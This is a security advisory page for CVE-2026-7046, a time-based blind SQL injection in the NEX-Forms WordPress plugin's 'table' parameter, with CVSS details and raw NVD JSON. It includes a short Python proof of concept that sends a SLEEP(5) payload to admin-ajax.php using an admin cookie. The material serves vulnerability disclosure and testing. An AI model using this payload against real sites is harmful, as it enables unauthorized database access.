Security Vulnerability Report
中文
CVE-2026-7046 CVSS 4.9 MEDIUM

CVE-2026-7046

Published: 2026-05-15 09:16:17
Last Modified: 2026-05-15 14:09:16
Source: [email protected]

Description

The NEX-Forms – Ultimate Forms Plugin for WordPress plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'table' parameter in all versions up to, and including, 9.1.12 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

CVSS Details

CVSS Score
4.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

NEX-Forms – Ultimate Forms Plugin for WordPress <= 9.1.12

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL (Example) target_url = "http://example.com/wp-admin/admin-ajax.php" # Authentication cookie for an admin user cookies = { "wordpress_logged_in_xxx": "admin_cookie_value" } # Payload demonstrating time-based blind SQL injection # The 'table' parameter is vulnerable and lacks escaping # Using SLEEP(5) to delay response if injection is successful payload_data = { "action": "nex_forms_dashboard_action", "table": "wp_existing_table WHERE 1=1 AND SLEEP(5)-- -" } try: response = requests.post(target_url, data=payload_data, cookies=cookies, timeout=10) # Check if the request took longer than expected due to SLEEP(5) if response.elapsed.total_seconds() >= 5: print("[+] Vulnerability confirmed: Response delayed by SQL injection.") else: print("[-] Vulnerability not detected or payload incorrect.") except requests.exceptions.RequestException as e: print(f"Error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-7046", "sourceIdentifier": "[email protected]", "published": "2026-05-15T09:16:17.250", "lastModified": "2026-05-15T14:09:15.910", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The NEX-Forms – Ultimate Forms Plugin for WordPress plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'table' parameter in all versions up to, and including, 9.1.12 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/tags/9.1.12/includes/classes/class.dashboard.php#L4220", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/tags/9.1.12/includes/classes/class.dashboard.php#L4224", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/tags/9.1.12/includes/classes/class.dashboard.php#L4344", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/tags/9.1.13/includes/classes/class.dashboard.php#L4220", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/tags/9.1.9/includes/classes/class.dashboard.php#L4220", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/tags/9.1.9/includes/classes/class.dashboard.php#L4224", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/tags/9.1.9/includes/classes/class.dashboard.php#L4344", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/trunk/includes/classes/class.dashboard.php#L4220", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/trunk/includes/classes/class.dashboard.php#L4224", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/trunk/includes/classes/class.dashboard.php#L4344", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2f2d8b21-1c25-4cfc-bf62-2e71d6a90d91?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.